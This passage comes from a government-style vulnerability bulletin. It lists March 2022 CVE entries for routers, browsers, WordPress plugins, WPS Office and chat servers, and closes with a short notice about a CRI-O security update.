instead. | 2022-03-17 | not yet calculated | CVE-2022-24761 MISC CONFIRM MISC |
| wavlink — routers | A vulnerability is in the ‘live_mfg.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router. | 2022-03-17 | not yet calculated | CVE-2021-44260 MISC |
| wavlink — routers |
A vulnerability is in the ‘wx.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner. | 2022-03-17 | not yet calculated | CVE-2021-44259 MISC |
| whale_browser — whale_browser | Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises. | 2022-03-17 | not yet calculated | CVE-2022-24074 CONFIRM |
| whale_browser — whale_browser | Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files. | 2022-03-17 | not yet calculated | CVE-2022-24075 CONFIRM |
| whale_browser — whale_browser |
The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool. | 2022-03-17 | not yet calculated | CVE-2022-24072 CONFIRM |
| whale_browser — whale_browser |
The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store. | 2022-03-17 | not yet calculated | CVE-2022-24073 CONFIRM |
| wireapp — wire-server |
wire-server provides back end services for Wire, an open source messenger. In versions of wire-server prior to the 2022-01-27 release, it was possible to craft DSA Signatures to bypass SAML SSO and impersonate any Wire user with SAML credentials. In teams with SAML, but without SCIM, it was possible to create new accounts with fake SAML credentials. Under certain conditions that can be established by an attacker, an upstream library for parsing, rendering, signing, and validating SAML XML data was accepting public keys as trusted that were provided by the attacker in the signature. As a consequence, the attacker could login as any user in any Wire team with SAML SSO enabled. If SCIM was not enabled, the attacker could also create new users with new SAML NameIDs. In order to exploit this vulnerability, the attacker needs to know the SSO login code (distributed to all team members with SAML credentials and visible in the Team Management app), the SAML EntityID identifying the IdP (a URL not considered sensitive, but usually hard to guess, also visible in Team Management), and the SAML NameID of the user (usually an email address or a nick). The issue has been fixed in wire-server `2022-01-27` and is already deployed on all Wire managed services. On premise instances of wire-server need to be updated to `2022-01-27`, so that their backends are no longer affected. There are currently no known workarounds. More detailed information about how to reproduce the vulnerability and mitigation strategies is available in the GitHub Security Advisory. | 2022-03-16 | not yet calculated | CVE-2022-23610 MISC CONFIRM |
| wp-downloadmanager — wp-downloadmanager |
Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). | 2022-03-18 | not yet calculated | CVE-2021-44760 CONFIRM CONFIRM |
| wp-downloadmanager — wp-downloadmanager |
Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url. | 2022-03-18 | not yet calculated | CVE-2022-25605 CONFIRM CONFIRM |
| wp_home_page_menu — qp_home_page_menu |
The WP Home Page Menu WordPress plugin before 3.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0684 MISC CONFIRM |
| wps_office_version — wps_office_version | The installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. | 2022-03-17 | not yet calculated | CVE-2022-25969 JVN CONFIRM |
| wps_office_version — wps_office_version |
The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. | 2022-03-17 | not yet calculated | CVE-2022-26081 JVN CONFIRM |
| wps_presentation — wps_presentation |
WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files(‘current directory type’ DLL loading). | 2022-03-17 | not yet calculated | CVE-2022-26511 JVN CONFIRM |
| x2crm — x2crm |
A Cross-Site Scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. As the vehicle for the attack, the application targets the users and not the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM. | 2022-03-16 | not yet calculated | CVE-2021-33853 MISC |
| xbit — xbit | A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the “n” (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code. | 2022-03-16 | not yet calculated | CVE-2021-45822 MISC MISC MISC |
| xbit — xbit |
A blind SQL injection vulnerability exists in Xbtit 3.1 via the sid parameter in ajaxchat/getHistoryChatData.php file that is accessible by a registered user. As a result, a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to get a remote code execution on the remote web server. | 2022-03-16 | not yet calculated | CVE-2021-45821 MISC MISC MISC |
| xebd — accel-ppp |
The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability. | 2022-03-16 | not yet calculated | CVE-2022-0982 MISC |
| yokogawa — widefield3 |
In Yokogawa WideField3 R1.01 – R4.03, a buffer overflow could be caused when a user loads a maliciously crafted project file. | 2022-03-18 | not yet calculated | CVE-2020-16232 CONFIRM CONFIRM |
| zero_spam — zero_spam |
The WordPress Zero Spam WordPress plugin before 5.2.11 does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection | 2022-03-14 | not yet calculated | CVE-2022-0254 CONFIRM MISC CONFIRM |
| zulip — zulip |
Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds. | 2022-03-16 | not yet calculated | CVE-2022-24751 MISC MISC CONFIRM |
This product is provided subject to this Notification and this Privacy & Use policy.
The Russian-speaking APT behind the NotPetya attacks and the Ukrainian power grid takedown could be setting up for additional sinister attacks, researchers said.
Categories
CRI-O Security Update for Kubernetes
Original release date: March 18, 2022
CRI-O has released a security update addressing a critical vulnerability—CVE-2022-0811—in CRI-O 1.19. A local attacker could exploit this vulnerability to take control of an affected Kubernetes environment as well as other software or platforms that use CRI-O runtime containers.
CISA encourages users and administrators to review the CRI-O Security Advisory and apply the necessary updates or workarounds.
This product is provided subject to this Notification and this Privacy & Use policy.